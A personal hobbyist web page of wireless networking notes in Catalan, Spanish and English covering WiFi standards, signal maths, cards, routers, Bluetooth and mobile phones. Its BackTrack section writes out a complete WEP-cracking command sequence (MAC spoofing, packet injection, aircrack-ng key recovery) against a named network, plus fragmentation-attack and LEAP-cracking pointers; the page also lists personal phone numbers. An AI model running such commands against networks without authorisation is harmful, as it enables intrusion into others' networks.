home / infca / wireless Before you judge a man, try walking in his shoes.

Arcadi | Irina Links | End

Xarxes inalàmbriques

 
Dedicat a en Jordi Buzón.
Tú sí que sabes motivarme.
 

WiFi 9106 CN-WF511 Tech stuff Exploit CD WiFi vs BT Mobils

Entorn WiFi

802.11a (wiki) - The 802.11a standard uses the same core protocol as the original standard (ratified in 1999), operates in 5 GHz band, and uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) with a maximum raw data rate of 54 Mbit/s, which yields realistic net achievable throughput in the mid-20 Mbit/s.

Using the 5 GHz band gives 802.11a a significant advantage, since the 2.4 GHz band is heavily used to the point of being crowded. Degradation caused by such conflicts can cause frequent dropped connections and degradation of service. However, this high carrier frequency also brings a slight disadvantage: the effective overall range of 802.11a is slightly less than that of 802.11b/g; 802.11a signals cannot penetrate as far as those for 802.11b because they are absorbed more readily by walls and other solid objects in their path.

2.4GHz only allows for 3 channels without an overlap - these are 1, 6 and 11. See list of wlan channels Wi-Fi (Wireless Fidelity) standard
Norma : 802.11b (1091 K) 802.11a is used by OTAN in Europe.
Arquitectura : Get all 802 !
Frequency band : 2,400 - 2,4835 GHz (Industrial Scientific Medical Band).
Legislación española : ver S5.150 en S5_1.doc de Sección III : disposición del cuadro de atribución de bandas de frecuencias. Channel 10-11 (Spain).

f (bottom of band) = 2,4 GHz => λ = 12,5 cm. f (top of band) = 2,4835 GHz => λ = 12,08 cm.

A common design for antennas is to make them 1/4 of a wavelength or less in length.

2,462 GHz is channel 11
Velicitat de transferència : 11 Mbps
Radio type : frequency hopping spread spectrum (FHSS)
Modulation : QFSK, BFSK, DBPSK
Hardware comparisons : Seattle
Receive sensitivity : FreeNetworks
Atenció a la seguretat : el AirSnort crakeja les claus d'encriptació ! I el WEPCrack !

ExtremeTech diu :

 WEP (wired-equivalent privacy) = encryption scheme for wireless traffic.
 Tools are readily available to break 40-bit WEP in a few minutes, and 128-bit WEP keys can be broken in a few days.

El AiroPeek (protocol analyzer) preten arreglar-ho.

IBM diu

Existing security for 802.11 wireless consists of two subsystems : a data encryption technique called Wired Equivalent Privacy (WEP) and an authentication method, either Shared Key or 802.1x. Both the encryption and authentication are optional, and wireless access points are typically shipped with both turned off.

I té el DWSA
Un article amb els esencials de la seguretat WiFi casolana.

WEP security

New WEP cracking tools : WEP.HTM

"WPA Cracking" ... "128 Bit WEP cracking" here "The minimum number of characters for a WPA-PSK passphrase is 8. The maximum is 63."

Chez moi :

SSID Security Type Encryption Cipher Aut Radio Type ------ -------------- ----------- ----- ---- ----------- belkin WPA2 AES CCMP PSK 802.11n WPA TKIP PSK 802.11g
Wireless A, B, G and N

IEEE 802.11n is a wireless networking standard created to improve network throughput over the two prior standards : Wireless-G (54 Mbps) or even Wireless-B (11 Mbps).

Wireless-N increased the maximum data transmission rate more than tenfold from 54 Mbps to 600-900 Mbps.

2,4 Ghz and 5 Ghz

The 2.4 GHz band is used for Wireless-G, and the 5 GHz for Wireless-N only.

All of the versions of Wi-Fi up to and including 802.11n (a, b, g, n) operate between the frequencies of 2400 and 2500 MHz. These 100 MHz are separated into 14 channels of 20 MHz each (overlapping).

The great thing about 5 GHz (802.11n and 802.11ac) is that because there’s much more free space at the higher frequencies, it offers 23 non-overlapping 20 MHz channels.

When setting the channels on your APs, try to stick with 1, 6, or 11. They are the only channels that don’t overlap. (2,4 GHz)

AUTO channel selection

AP and CSA (channel switch announcement) frames

The Channel Switch Announcement element is used by an AP in a BSS, a STA in an IBSS, or a mesh STA in an MBSS to advertise when it is changing to a new channel and the channel number of the new channel.

DFS is a spectrum-sharing mechanism that allows wireless LANs (WLANs) to coexist with radar systems.

If your AP want to use a 5 GHz channel, it need to support Dynamic Frequency Selection (DFS for short). If interference is detected after the AP has started, it sends a Channel Switch Announcement telling the stations that the AP will change channel after the next X beacons. The stations must obey or they will be disconnected.

Tool

A free scanner utility is Nirsoft’s WifiInfoView, which doesn’t even require installation. Just unzip and run it, and check out all of the networks using each channel.

Range extender

Si volem tenir una xarxa propia "itinerant" i conectar-nos a Internet només en algun moment, ens cal una configuracio com aquesta, on el punt (1) dificilment pot ser un cable (estem en un hotel) :

xarxa publica <- . -> xarxa privada d'en Albert . -> terminals d'en Albert .---------------. . . | | ​ | | (1) LAN​/WAN .---------------. (2) LAN/WAN .--------. | Router | =======.======= | Router | =====.======= | mac | | hotel | | Albert | | .--------. | (a) | | (b) | | | | .---------------. | .--------. .---------------. .------- | rspi | .--------.

See FastLane !

El problema és que la password de internet proporcionada per el router (a) s'ha de posar manualment a tots els terminals que es conectin al router (b)

 

 

Servidors (Access Point)

 

 

 

Clients : wireless card, tarjes Wi-Fi (802.11b)

  • Lucent

  • Orinoco (15 dbm power output)

  • Apple Airport

  • Cisco

  • Linksys

  • D-Link : DWL-650 PCMCIA is cheap and has Linux support

  • Edimax
    • PCMCIA
      • EW-7102PC = Wireless LAN PCMCIA adapter (*linux*)
      • EW-7103PC = Wireless LAN PCMCIA adapter (*linux*)
    • USB
      • EW-7112U = Wireless LAN USB adapter
      • EW-7115U = Wireless LAN USB adapter
    • PCI
      • EW-7122 = Wireless LAN PCI adapter (*linux*)
      • EW-7123 = Wireless LAN PCI adapter

  • Surecom
    • PC Card : EP-9427
    • USB Card : EP-9001

  • En Jordi te una PCMCIA Edimax, EW-7102 PC
    A Edimax seccio "products" + "wireless" :
    • EW-7103 PC : pcmcia wireless network adapter, 12 dBm output power (typ), -80 dBm receiver sensitivity (min). Coverage area : closed space (25m).
    • EW-7123 PC : pci wireless network adapter
    • EW-7205 AP : access point. Data packet bridging between wireless network (802.11b) and Ethernet network (802.3). Operating range : open space (100-300m), indoor (35-100m).
    Per les WS amb USB, en Jordi té una Edimax 7115-U

  • En Bulma recomana Conceptronic.
    Ep : a BCN es troba a Pricoinsa & JUMP (IE only) [Rda Sn Antoni, 38] & FNAC
    La Conceptronic PCI C11iDT porta una antena exterior !

  • A Seattle recomanen Lucent Silver/Gold (Hermes chipset)
    On the Prism chipset, ther's a lot of manufacturers.

  • Araceli has a Conceptronic Wireless 54Mbps adaptador USB

  • SAG has a wifi card !

  • A wifi dongle is a common name for a wireless USB adapter, which is the same thing as a WiFi card except it uses a USB interface instead of PCI or PCIe.

  • Monitor mode is one of the six modes that 802.11 wireless cards can operate in:
    • Master (acting as an access point),
    • Managed (client, also known as station),
    • Ad-hoc,
    • Mesh,
    • Repeater,
    • and Monitor mode

    Mes detall {wireless.kernel.org}

 

 

 

Edimax EW-7115U

  • Library : Transmit power = 15 dBm, Receive sensitivity = -80 dBm.
  • datasheet or PDF
  • Torrelles :
    2 WS s'han conectat quan hem posat "AdHoc" + (E)SSID
  • W2K :
    • Install under W2k :
      do not plug the USB adapter until the Application setup has been completed
      To install the drivers and the "Configuration & Monitor utility", run setup.exe from the CD.
    • Uninstall under W2k :
      • to remove the "Monitor & Configuration utility", select "Uninstall Configuration & Monitor utility" option (Start -> Programs -> Amter 802.11 Wireless LAN). It is recommended to stop the USB adapter and "Exit" the application !
      • to uninstall the USB adapter, select it in the Device Manager, and press "Uninstall" - can be performed only if the USB adapter is plugged in
  • Linux + USB : Atmel AT76C503 based wireless USB devices. VID=0x03EB, PID=0x7603, MAC=AT6C503A, Radio=RFMD (not Intersil).
    Another similar (identical) place
    How to build and install the GPL drivers.
    Another HowTo.
    SuSE 8.0 (and more) specifics (config).


US Robotics 9106

Amunt! Top Amunt!

 

9106 Specifications [url]

    * Network address translation (NAT)
    * Integrated 802.11g (54Mbps) wireless access point
          o 54Mbps data rate with auto fallback
          o 2 x detachable 2 dBi reverse SMA antennas
          o Support for WEP and WPA-PSK
          o Mac address filtering
          o Disable SSID
    * Integrated ADSL modem - 1 x RJ11 connection - velocitat ?
    * 4 x 10/100Base-T auto MDI-MDIX RJ45 switched LAN ports
    * Built-in firewall with stateful packet inspection (SPI)
    * Integrated DHCP server
    * Virtual private network (VPN) pass-through
    * UPnP enabled
    * DMZ hosting and port forwarding
    * Web-based & remote configuration
    * 2 year manufacturer warranty
 

Homepage

Search for FLOW CONTROL

 El modelo del ADSL Wireless Gateway
 Model 9106 ¢ USR209106
 SN:1DAH2A3D0439

Amunt! Top Amunt!
My Wifi cards & routers
P4 / Airis : Canyon CN-WF511

Chipset & driver by fabricante : url

Mine : URL

Norma = 802.11g, ID del producto = CN-WF511, Interface = PCI, Chipset = Ralink (chip RT2560F), Driver = rt2x00, Trabaja con Linux = verde.

Comentarios - driver available from manufacturer: http://web.ralinktech.com/ralink/Home/Support/Linux.html
=> http://rt2400.sourceforge.net/
=> http://rt2x00.serialmonkey.com, or http://sourceforge.net/projects/rt2400.

3 fotos :

T42

Ubuntu lspci says : Intel Corp. PRO/Wireless 2200 BG (rev 05)
So, it is a IPW2200 BG card

Norma = 802.11g, ID del producto = 2200BG, Vendedor y código del producto = man:8086 dev:4220, Interface = mini-PCI, Chipset = IPW2200, Driver = ipw2200, Trabaja con Linux = verde
Comentarios : http://ipw2200.sourceforge.net/

[t42:\Fonts\WireLess\Drivers\T42]

T400 (Abr 2010)
Integrated card

XP says : Intel(R) WiFi Link 5100 AGN ; mac = 00:22:FA:D1:5A:90 ; driver = NETw5x32.sys ;

AIR-PCM352 (pcmcia)

XP says : "Cisco Systems 350 Series PCMCIA Wireless Adapter : driver = pcx500.sys ;
soft, download.

Belkin Play N600, model F7D4101v2 (Oct 2014)

Play N600 USB Wireless N Dual Band.

Help (Spain) : 902.02 43 66

ISO (146 MB)

MTV, 201512 : Comtrend

5813 foto, manual [default 192.168.1.1, "1234"]

Portal Alejandra - configuración de routers

Admin pwd
100 Mbps

“Wireless -> Advanced“, cambiamos :

url

MTV, 201601 : HUAWEI ONT HG 8240

El Echo Life HG8240 es un terminal de red óptica (ONT) para interiores de la solución FTTH Huawei. Con el uso de la tecnología GPON, ofrece acceso de banda ultra-ancha para usuarios residenciales y pequeñas empresas. Proporciona dos puertos POTS y cuatro puertos Ethernet GE/FE de adaptación automática.

Homepage

Fibra Optica
SAG Belkin N300 wireless N router, model F9K1002v5 (May 2015)

Default values :


Tech stuff

Amunt! Top Amunt!
  • Free Networks
  • dB = 10 * log(a/b) ; 'a' and 'b' is power in mW
  • dBm = 10 * log(P) ; for dBm, 'b' is 1 mW.
  • a dBm is power level referenced to 1 milliwat => 0dBm = 1 mW.
  • 1 W => 10 log 1000 mW / 1 mW = 10 log 1000 = 10 * 3 = +30 dBm
  • 100 mW = +20 dBm
  • 10 mW = +10 dBm
  • doubling the power increases the reading by slightly more than 3 decibels, actually close to 3.010299 dB : 10 * log(base 10) 2 = 3,01029995664
  • 3 dBm + 3 dB = 6 dBm ( 2 mW * 2 = 4 mW )
  • 3 dBm - 3 dBm = 0 dB ( 2 mW / 2 mW = 1 )
  • mW to dBm
  • dBm to mW

 

 

  dBm  
+ 3dB     log
  mW  
x 2     log
0 1
3 2
6 4
9 8
10 10
12 16
15 32
18 64
20 100
21 128
24 256
27 512
30 1024
30 1000

 

 

Pèrdua de senyal a l'espai lliure :

  Loss = 32 + 20 x Log ( F x D ) 
  where
 Loss = free space path loss in dB
 F = operating frequency in Mhz
 D = distance in Km
 Include a fade margin of about 10 dB ...
So for a simple example, how far can a pair of Wavelan cards get with the little supplied patch antennas of 8 dbi ? The answer is :
 Tx power = + 20 dbm
 Combined antenna gains = 16 ( 8 + 8 )
 Rx sensitivity = -74 dbm
 Total link budget = 20 + 16 - ( -74 ) = 110 db
 Max distance = 4 km aprox

 loss = 32 + 20 x log (2450 x 4) = 111.

 With 10 dB margin we have :

    100 dB > 32 + 20 x log ( 2450 x d )
     68/20 > log ( 2450 x d )
     10 exp (68/20) / 2450 > d
     d < 1,025 Km
Bluetooth uses 1mW to reach 10 m [verify]

 

Vocabulari

  • Wlan Primer and FAQs

    Every device (wireless card) in an 802.11 network is known as a station (abbreviated STA). A collection of stations that communicate with each other is known as a Basic Service Set (BSS), which covers a certian Basic Service Area (BSA). Stations that are not within the BSA can't directly participate in a BSS with each other.
    When stations are participating in a BSS, they share a common set of network parameters. They all transmit/receive on the same channel, they understand the same data rates, they use a common BSSID, and they are synchronized to the same timer. In a BSS, all of those parameters are broadcast in beacon frames that are sent at a regular interval.
    Two BSS's could coincidentally share the same channel, common data rates, and timer, so some unique identifier is necessary. That unique identifier is a 6-byte number that identifies the BSS (the BSSID). Packets in a BSS, in addition to being addressed from one station to another, also include the BSSID.
    There are two kinds of BSS's: the independent BSS (IBSS) and the infrastructure BSS.
    An IBSS is usually an ad-hoc network, and they're meant for peer-to-peer networking. An IBSS resembles a bunch of computers on the same Ethernet segment--they can all hear each other, and packets are sent directly to the recipient. In an IBSS, all of the stations are responsible for sending beacons, and the BSSID is randomly generated.
    In an infrastructure BSS, there is exactly one access point (AP). When one station wishes to send data to another station, the packet is sent first to the AP, and then the AP delivers the packet. The BSSID of an infrastructure BSS is the MAC address of the AP's station interface, and the AP is the only station that sends out beacons. The AP is sometimes known as the BSS master, and the other stations are BSS clients.
    802.11 networks grow by combining infrastructure BSS's into larger Extended Service Sets (ESS's), which cover Extended Service Areas (ESA's). In order for stations in one BSS to talk to stations in other BSS's, the stations must take advantage of distribution system services (DSS). The distribution system (DS) is the magical thing that connects BSS's into one ESS, and it's defined by the services that AP's connected to the DS provide.

  • SSID = Service Set Identifier.
    32-byte string that identifies an IBSS or an ESS (or a single infrastructure BSS). It's often called the network name or ESSID. The SSID is a unique ID given to the Access Point.
    Wireless clients associating to any Access Point must have the same SSID. Alternatively, "ANY" (all characters in upper case) may be used.
    BSSID - basestation ID. (Access Point MAC address)

  • Infrastructure = with Access Point, AdHoc = without Access Point.

    In Ad-Hoc mode : Ad-Hoc network is a group of computers, each with a WLAN adapter, connected as an independent wireless LAN. All stations in the WLAN should set the same ESSID and operation channel. Each node (station) acts as a router for the other nodes. See Snoop
    In Infrastructure mode : an integrated wireless and wired LAN is called an Infrastructure configuration. Set the ESSID to be the same with the AP you associate to.

  • RTS threshold - mechanism implemented to prevent the "hidden node" problem.
    A packet size is specified, and the RTS/CTS mechanism will be activated if the packet size exceeds the specified value.

  • pigtail - cable (corto, flexible) que tiene en un extremo un conector N para enroscar la antena, y en el otro extremo un conector específico que se acoplará en nuestro hardware wireless. Few pictures



Get a packet monitoring tool for wireless LAN


See Sniffer 4.6 [12 dolars]
AirMagnet Duo complementing Sniffer Wireless article
And Snort [for W2K]
Here is a wireless kismet scanner (requires driver in promiscous mode) Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Windows ones :
  • SpyNet sniffer : CaptureNet v3.12 + PeepNet => "Iris" Network Traffic Analyzer
  • CommView v2.0 sniffer
Read about Anti-Sniff. Also about packets and protocols ! Even points to GG243376 !
In Win2000Mag also ! [NT only !]
 AntiSniff exploits the method NT uses to handle packets by sending a packet to the system
 using an Ethernet address of FF:00:00:00:00:00
 and the IP destination address of the system you want to check.
 When a network card is operating in promiscuous mode in NT,
 it will respond to the packet that AntiSniff has sent,
 revealing that a packet sniffer might be active on the system.

 For its DNS tests, AntiSniff puts itself in promiscuous mode
 and sends a packet out on the network using a predetermined IP address
 in the packet header. If a packet sniffer is listening on the network
 and configured_as some are_to perform reverse
 DNS lookups for the packets it captures, then the system running the
 packet sniffer will transmit a reverse DNS lookup request for the IP
 address in the packet AntiSniff sent.
 The product captures that particular action (the reverse DNS lookup),
 tricking the packet sniffer into revealing itself on the network.

Other network analyzers :

List of sniffers : http://www.packetattack.com/wireless.html - and more ! [*****]

War driving : MacStumbler (Airport wireless cards only)

Read about WEP


 

Auditor Security Collection

From here

BackTrack is the result of the merging of the two innovative penetration testing live linux distributions Auditor security collection and Whax. : BackTrack download : v3 Beta - 14-12-2007, v4 bt4-beta.iso 02/2009. 2010 new home : http://www.backtrack-linux.org/.

See also WifiSlax (v 3.1, 683 MB, at 2007/12 has kernel 2.6.21.5, meaning no "iwlagn" for T400), KisMet, Stumbler (guindous). Nice Blog.

2017 - now it is Kali

Centuriones !

Kernel := 2.6.6 ! [10/01/2005]
MacChanger :

     -s eth0 => 00.02.8A.3C.31.4F
     -s eth1 => 00.09.6B.86.5C.57
     -m => provide New AA.BB.CC.DD.EE.FF

Auditor-200605-02 : !IMPORTANT!!
This version has two different ISO versions, becasue the Intel B and the Intel B/G card drivers IPW2100 and IPW2200 does not work well in cooperation. While B cards does not seem to have a problem, systems with B/G cards (ipw2200) seemed to hang during boot. To overcome this problem (until the drivers are fixed) we release two iso's of the CD to support your needs. If you want to be able to use Auditor Security Collection on a system with an IPW2200 card you need to download the "-no-ipw2100" version of the iso otherwise it will not boot. A system with B card based on IPW2100 will work with it, but no driver will be loaded for the B only card. If you never run it on a System with IPW2200 take the "ipw2100" version, the ipw2100 driver is included in this version.

List of tools.
Device list
Tutorials

BT4

Homepage : http://www.backtrack-linux.org/, but drac is from Legacy Filmworks ! (2014) -> Kali

To start BT4 :

  • network : /etc/init.d/networking start ;
  • KDE : startx ;
  • FVWM : bt4-crystal ;
Eines al BT4

Les utilitats que hi ha al BT4 son :

aircrack-ng - airmon-ng - AirSnarf - ASLEAP - Automated LEAP attack tool- tool to Crack Cisco LEAP, August, 2003. SourceForge. Cowpatty - Genpmk - Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. url MacChanger -
wifi cards

To display card manufacturer to Linux driver compliance : http://linux-wless.passys.nl/.
How to display vendor &: product code :

# lspci -vv | grep Intel {for a PCI card : read here} 00:0b.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Subsystem: Intel Corporation: Unknown device 2702 Now, look for the device number: # lspci -n | grep 00:0b.0 00:0b.0 Class 0280: 8086:4220 (rev 05)
Acradi Acer Aspire 5741
$ lspci 03:00.0 Network controller : Broadcom Corporation device 4357 (rev 01) Subsystem : Foxconn International Inc, device E021 Kernel drive in use : wl # lspci -n | grep 03:00.0 03:00.0 0280: 14e4:4357 (rev 01)

BCM page has move to b43 driver page.

When booting BT4, I find

$ cat /var/log/messages | grep Broadcom bt kernel: eth0: Broadcom BCM4357 802.11 Wireless Controller 5.10.91.9

Also I find
$ iwconfig eth0 IEEE802.11bgn ESSID:"" Nickname:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

No permet ficar-se en mode tafaner :
$ iwconfig eth0 mode monitor SET failed on device eth0: invalid argument.

Pero si es pot configurar si sabem la clau :
$ iwconfig eth0 mode managed
Irina Acer Aspire 6930
$ lspci 07:00.0 Network controller : Intel Corporation, Wireless WiFi Link 5100 Kernel drive in use : iwlagn Kernel modules : iwlagn $ lspci -n | grep 07:00.0 07:00.0 0280: 8086:4232

ipw5100 uses iwlagn driver : green, wlan type := 802.11a/n, vendor & product code := man: 8086 dev: 4237, mini-PCIe.

Al log trobo :

$ cat /var/log/messages bt kernel: iwlagn 0000:07:00.0 Detected Intel Wireless WiFi Link 5100AGN REV=0x54

El nostre device és wlan0 :

$ iwconfig wlan0 IEEE802.11abgn ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

El configurem :

$ ifconfig wlan0 down $ macchanger -m 00:11:22:33:44:55 wlan0 Current MAC: 00:21:5d:4c:3e:d0 (unknown) Faked MAC: 00:11:22:33:44:55 (Cimsys Inc) $ iwconfig wlan0 mode monitor $ ifconfig wlan0 up

Anem per feina :

$ airodump-ng wlan0 veure xarxes : WLAN_C5, ch 3, BSSID 00:19:15:4F:92:AA ; $ airodump-ng --channel 3 wlan0 veure nomes dades del canal 3 $ airodump-ng -c 3 -w test -bssid 00:19:15:4F:92:AA wlan0 esperar paquets #Data (no tancar finestra !) $ aireplay-ng -1 0 (-e WLAN_C5) -a 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 do associate to router $ aireplay-ng -3 -b 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 entrar pakets per a que #Data pugi mes rapid, fins 10.000 ! $ aircrack-ng -b 00:19:15:4F:92:AA test-01.cap desxifrar : wait "KEY FOUND" $ iwconfig wlan0 mode manakeg key 31:32:33:34:35:36:37:38:39:30:31:32.33 conectar al router amb la clau $ dhcpcd wlan0 get IP $ ifconfig wlan0 display configuration $ ping www.google.es use Internet ;
Misc

BT forums.


WifiSlax
  • boot CD
  • login as "root" / "toor"
  • either :
    • "startx" = engegar entorn Xwindow
    • "xconf" = configurar tarja gràfica
    • "ifconfig eth0 up" = engegar xarxa local
    • "pump" / "dhclient" = get an IP from the DHCP server
    • si hi ha problemes, mirar /var/log/messages o /var/log/syslog
  • Airis P4 : Canyon CN-WF511 Ralink RT2500 Wireless LAN Card => RT2500 chipset Driver URL ; card description ; driver download {win} ; T42:\Fonts\WireLess\Drivers\P4_Airis\rt2500-1.0.0.tar.gz
  • T42 : Intel Corp. PRO/Wireless 2200 BG (rev 05)
  • ataque fragmentación / get PRGA - Sample.
    • configurar wireless :
      iwconfig ra0 rate 1M channel 6 mode monitor
    • start airodump :
      airodump-ng --ivs -w clave -c 6 ra0


LEAP & ASLEAP

LEAP is ...

Asleap is ... - Automated LEAP attack tool. Another tool : LEAP cracker.

few links : Flim; VT - blog.


Amunt! Top Amunt!
Movistar

Su Movistar Internet incluye:

Preu : 33,8843 €/mes - 11,6500 € (promoción Movistar Internet, durante 12 meses)

Router "equipo para acceso fibra óptica GPT-2541 GNAC 00412926". És un "Mitrastar". Cifrado : WPA2-PSK. Encriptación : AES.

W500 can connect to MOVISTAR_PLUS_BCD1 at 5 GHz.

seguiment myIP i velocitat a Movistar

SpeedTest o WhatIsMyIP o IPinfo diu :

20160318 - 88.1.200.218 20160319 - 83.50.48.155 20160402 - 88.7.220.132 20160410 - 88.7.220.132 20160425 - 88.7.220.132 20160516 - 88.16.67.1 {returning to enxaneta from wlangas2} 20160529 - 88.16.67.1 20160606 - 88.17.57.125 20160608 - 88.7.181.116 20160705 - 88.7.181.116 20160711 - 88.17.57.34 20160719 - 88.18.117.86 20161024 - 79.145.34.176 [73 Mbps de baixada, 32 de pujada] 20161028 - 79.145.34.176 {via Android !!! ???} 20161130 - 81.36.227.226 20170201 - 83.40.226.198 20170622 - 83.32.249.161, 118 Mbps down, 188 Mbps up 20170821 - 2.138.8.221, 98/96 {wifi "enx"} - 170/180 {wifi bcd1} - 281/283 {cable} 20171022 - 83.37.66.173 : enx 88/100, plus 206/233, cable 308/309
Trassa
c:\> tracert -d 1.2.3.4 {PLUS_BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 183 ms 1 ms 2 ms 192.168.1.1 2 206 ms 2 ms 2 ms 10.139.130.97 3 216 ms * 8 ms 172.25.66.1 4 234 ms 5 ms 4 ms 172.25.51.178 5 25 ms 12 ms 13 ms 192.168.4.1 6 * * * Request timed out. 7 32 ms 9 ms 7 ms 80.58.67.116 8 216 ms 9 ms 10 ms 80.58.118.249 9 * * * Request timed out. C:\> tracert -d 1.2.3.4 {BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 2 ms 2 ms 3 ms 192.168.1.1 2 42 ms 5 ms 4 ms 192.168.144.1 3 7 ms 7 ms 6 ms 80.58.121.233 81.46.131.33 {20160402} 81.46.112.173 {20161130} 4 * * * Request timed out.
Administració router
Restaurar a valores de fábrica

Con el router encendido, presionar el botón Reset (último a la derecha por detrás) durante al menos 10 segundos. Transcurridos 90 segundos, el router tendrá los valores de fábrica de nuevo.


Appendix: 802.11b demystified

BSS = Basic Service Set
A cell of stations which may or may not have an access point. A "coordination function" acts as collision detection.

IBSS = Independent Basic Service Set
A self-contained BSS with no access point, one of the members can assume the "coordination function". This is the 802.11 peer-to-peer mode of operation also known as Ad-Hoc mode. Only one wireless "cell" is supported for each different SSID. All communication is done from Client to Client without the use of an Access Point. Clients use the same SSID for establishing the wireless connection.

SSID = Service Set Identifier
A 32 octet-long network name; exactly one per ESS or IBSS.

Infrastructure mode = Managed mode
This mode of operation requires the presence of an 802.11 Access Point. All communication is done via the Access Point which relays packets to other wireless Clients in the BSS as well as to nodes on a wired network such as Ethernet.

ESS = Extended Service Set
A set of one or more interconnected BSSes. All traffic flows through an access point.

BSSID
6 octet cell identifier for a BSS. Value is the same as access point MAC address. Used in iwconfig for the cell value.

Origin URL  



WiFi vs BlueTooth

Amunt! Top Amunt!

wifi specs

2.462.000 KHz = 2.462 MHz = 2,462 GHz

wiki wifi

bluetooth specs

A Bluetooth device playing the role of the "master" can communicate with up to 7 devices playing the role of the "slave". This network of "group of up to 8 devices" (1 master + 7 slaves) is called a piconet.
Every device has a unique 48-bit address. Every device also has a 24-bit class identifier.

Air interface

The protocol operates in the license-free ISM band at 2.45 GHz. In order to avoid interfering with other protocols which use the 2.45 GHz band, the Bluetooth protocol divides the band into 79 channels (each 1 MHz wide) and changes channels up to 1600 times per second. Implementations with versions 1.1 and 1.2 reach speeds of 723.1 kbit/s. Version 2.0 implementations feature Bluetooth Enhanced Data Rate (EDR) , and thus reach 2.1 Mbit/s.
Technically version 2.0 devices have a higher power consumption, but the three times faster rate reduces the transmission times, effectively reducing consumption to half that of 1.x devices (assuming equal traffic load).

url

Bluetooth differs from Wi-Fi

The latter provides higher throughput and covers greater distances but requires more expensive hardware and higher power consumption. They use the same frequency range, but employ different multiplexing schemes. While Bluetooth is a cable replacement for a variety of applications, Wi-Fi is a cable replacement only for local area network access.

A glib summary is that Bluetooth is wireless USB, whereas Wi-Fi is wireless Ethernet, both operating at much lower bandwidth than the cable systems they are trying to replace.


How stuff works :
One of the ways Bluetooth devices avoid interfering with other systems is by sending out very weak signals of about 1 milliwatt ...
Bluetooth can connect up to eight devices simultaneously ...
Bluetooth uses a technique called spread-spectrum frequency hopping that makes it rare for more than one device to be transmitting on the same frequency at the same time. In this technique, a device will use 79 individual, randomly chosen frequencies within a designated range, changing from one to another on a regular basis. In the case of Bluetooth, the transmitters change frequencies 1,600 times every second, meaning that more devices can make full use of a limited slice of the radio spectrum. Since every Bluetooth transmitter uses spread-spectrum transmitting automatically, it's unlikely that two transmitters will be on the same frequency at the same time. This same technique minimizes the risk that portable phones or baby monitors will disrupt Bluetooth devices, since any interference on a particular frequency will last only a tiny fraction of a second.
When Bluetooth-capable devices come within range of one another, an electronic conversation takes place to determine whether they have data to share or whether one needs to control the other. The user doesn't have to press a button or give a command -- the electronic conversation happens automatically. Once the conversation has occurred, the devices -- whether they're part of a computer system or a stereo -- form a network. Bluetooth systems create a personal-area network (PAN), or piconet, that may fill a room or may encompass no more distance than that between the cell phone on a belt-clip and the headset on your head. Once a piconet is established, the members randomly hop frequencies in unison so they stay in touch with one another and avoid other piconets that may be operating in the same room.


Links

Mòbils

Amunt! Top Amunt!
  • Estandards
    • GSM
      Com va ? El canvi de frequencies en canviar de cel.lula ? El Roaming ?
      Teleco info, good intro.
      Com es fa una recàrrega ?
      • as CORTIX : arriba un missatge !
      • as usual : buy a card and enter the (large) code. Is anything sent before "saldo" is updated ?

      Com puc consultar el meu saldo per Internet ?

    • GPRS [General Packet Radio Service]

    • UMTS [Universal Mobile Telecommunications System]  
      Telefonia móvil de tercera generación.
      • España
        • Telefónica
        • Vodafone
        • Amena Auna - Oct 2004
        • Xfera
      • Francia
        • Orange (France Telecom)
        • SFR (Vivendi)
      • Alemania
        • T-Mobile (Deutsche Telekom)
        • Vodafone
        • Mobil COm (France Telecom)
        • 3G (Telefonica/Sonera)
        • E-Plus (KPN)
      • Italia
        • Telecom Italia Mobile
        • Omnitel (Vodafone)
        • Wind (France Telecom)
        • Telefonica PSE
        • Andala
      • Reino Unido
        • Vodafone [CDM ???]
        • TIW
        • Orange
        • British Telecom
        • Onezone
    • HDSPA (Feb 2006)

  • USA (millones de clientes)
    • Verizon Wireless : 36
    • Cingular : 23,4 [GSM] (1) unides el 18/Feb/2004
    • AT&T wireless : 21,9 [GSM] (1)
    • Sprint : 15,5
    • Nextel : 12,3
    • T-mobile : 12,1

  • Operadors mundials [9/3/2004]
    1. China Mobile
    2. Vodaphone
    3. China Unicom
    4. TEM + BSLA : 62,5 millons
    5. T-Mobile
    6. Orange
    7. NTT DoComo
    8. Cingular + AT&T Wireless

  • alliberació

  • IMEI : Enter *#06# on your phone's key pad and the 15 digit number will be displayed on the screen.

  • Com es fa : vaig al CORTIX, em cobren uns diners, envien un SMS dient que tinc mes saldo. El saldo es a la tarjeta o a la central ?

  • Com es passa l'agenda del mobil al PC i al inrevés ?
    CF62 - easy : use Siemens Data Suite [18,7 MB]
    Cable :
    • conexion to COM port : DCA-500
    • conexion to USB port : DCA-510

    f:\miscosas\CF62 !

 


  • Ionna : 666.36.38.42 - Siemens C45.

  • Nico : 670.85.84.98 - Siemens C45.

    2-on : 66666.38.59 - Siemens SL-55

  • Arcadi : 66.10.66.400 - Nokia 5140

  • CF62 - Siemens : 667.33.88.59

  • V3 - Motorola : 677.65.86.99

http://www.my-siemens.com

http://www.vidisa.es


Configuring an Access Point as a wireless repeater

Read Link Sys


Dubtes

Differences :

See BT4 and wiki.

Seguretat & WiFi & jerga
Wireless security type : Use 802.1x EAP Cisco (LEAP) + data encryption = TKIP.

802.1x, EAP.



Amunt! Top Amunt!
Tools
Phone
Scan range for alive IPs
c:\> FOR /L %i IN (1,1,255) DO @echo 192.168.1.%i & @ping -n 2 192.168.1.%i -w 900 | find "Reply"

Wifi 802.11x speeds

IEEE Standard / Speed

802.11a


Amunt! Top Amunt!
Wifi networks order

If you have multiple wifi networks available, Windows will try to connect to them in the order specified by

  1. Control Panel
  2. Network and Internet
  3. Manage Wireless Networks

Right-click on any item and select "Move Up" or "Move Down" from the menu.


Amunt! Top Amunt!
Wifi links

Ep ! Site under construction. Escriu-me !
Updated 20171117 (A)  
Uf !